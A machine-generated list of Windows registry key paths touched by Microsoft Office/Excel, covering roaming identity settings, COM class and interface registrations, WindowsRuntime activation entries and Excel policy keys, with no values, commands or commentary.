HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\b8b6ef7a\35856241\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\b8b6ef7a\35856241\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\b8b6ef7a\35856241\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\b8b6ef7a\35856241\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\b8b6ef7a\35856241\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\c621e5f8
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\c621e5f8\-1299563782
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\c621e5f8\-1299563782\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\c621e5f8\-1299563782\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\c621e5f8\-1299563782\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\c621e5f8\-1299563782\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\c621e5f8\-1299563782\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\c886cec6
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\c886cec6\1884667739
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\c886cec6\1884667739\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\c886cec6\1884667739\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\c886cec6\1884667739\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\c886cec6\1884667739\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\c886cec6\1884667739\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\c97901ac
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\c97901ac\1884492300
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\c97901ac\1884492300\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\c97901ac\1884492300\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\c97901ac\1884492300\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\c97901ac\1884492300\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\c97901ac\1884492300\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\deacd2e8
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\deacd2e8\-239451978
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\deacd2e8\-239451978\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\deacd2e8\-239451978\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\deacd2e8\-239451978\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\deacd2e8\-239451978\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\deacd2e8\-239451978\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\ListItems
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\COM3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\GipActivityBypass
HKEY_CURRENT_USER\Software\Classes\Interface\{E1CDD77A-65D3-4DB0-B339-21F6A48CC2FF}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{E1CDD77A-65D3-4DB0-B339-21F6A48CC2FF}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{E1CDD77A-65D3-4DB0-B339-21F6A48CC2FF}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{E1CDD77A-65D3-4DB0-B339-21F6A48CC2FF}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{E1CDD77A-65D3-4DB0-B339-21F6A48CC2FF}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{E1CDD77A-65D3-4DB0-B339-21F6A48CC2FF}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{E1CDD77A-65D3-4DB0-B339-21F6A48CC2FF}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\(Default)
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\InprocHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\AppID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\LocalServer
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{41FD88F7-F295-4D39-91AC-A85F3149A05B}\InProcHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountInternal
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountInternal
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountInternal\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountInternal\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountInternal\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountInternal\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountInternal\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountInternal\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountInternal\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountInternal\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountInternal\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountInternal\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountInternal\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountInternal\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountInternal\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\ActivateOnHostFlags
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\TokenBroker\TestHooks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\XAML
HKEY_LOCAL_MACHINE\Software\Microsoft\XAML
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\XAML\OneCoreTransformsEnabledByDefault
HKEY_CURRENT_USER\Control Panel\Colors
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent
HKEY_CURRENT_USER\Software\Classes\Interface\{2DBDBA9D-20DA-519D-9078-09F835BC5BC7}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{2DBDBA9D-20DA-519D-9078-09F835BC5BC7}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{2DBDBA9D-20DA-519D-9078-09F835BC5BC7}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{2DBDBA9D-20DA-519D-9078-09F835BC5BC7}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{2DBDBA9D-20DA-519D-9078-09F835BC5BC7}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{2DBDBA9D-20DA-519D-9078-09F835BC5BC7}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{2DBDBA9D-20DA-519D-9078-09F835BC5BC7}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\(Default)
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\InprocHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\AppID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\LocalServer
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Accent
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Personalization
HKEY_CLASSES_ROOT\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\ValidationSinkHandlerName
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\PrivacyDialogsDisabled
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Security\DLP
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Security\DLP
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Common\OPerfMon
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0
HKEY_CURRENT_USER\Software\Policies\Microsoft\Cloud\Office\16.0\Excel\DisabledCmdBarItemsList
HKEY_CURRENT_USER\Software\Policies\Policies\Microsoft\Cloud\Office\16.0\Excel\DisabledCmdBarItemsList
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\DisabledCmdBarItemsList
HKEY_CURRENT_USER\Software\Policies\Policies\Microsoft\Office\16.0\Excel\DisabledCmdBarItemsList
HKEY_CURRENT_USER\Software\Policies\Microsoft\Cloud\Office\16.0\Excel\DisabledCmdBarItemsCheckBoxes
HKEY_CURRENT_USER\Software\Policies\Policies\Microsoft\Cloud\Office\16.0\Excel\DisabledCmdBarItemsCheckBoxes
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\DisabledCmdBarItemsCheckBoxes
HKEY_CURRENT_USER\Software\Policies\Policies\Microsoft\Cloud\Office\16.0\Excel\DisabledShortcutKeysList
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\DisabledShortcutKeysList
HKEY_CURRENT_USER\Software\Policies\Policies\Microsoft\Office\16.0\Excel\DisabledShortcutKeysList
HKEY_CURRENT_USER\Software\Policies\Microsoft\Cloud\Office\16.0\Excel\DisabledShortcutKeysCheckBoxes
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\DisabledShortcutKeysCheckBoxes
HKEY_CURRENT_USER\Software\Policies\Policies\Microsoft\Office\16.0\Excel\DisabledShortcutKeysCheckBoxes
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\ConvertDocument
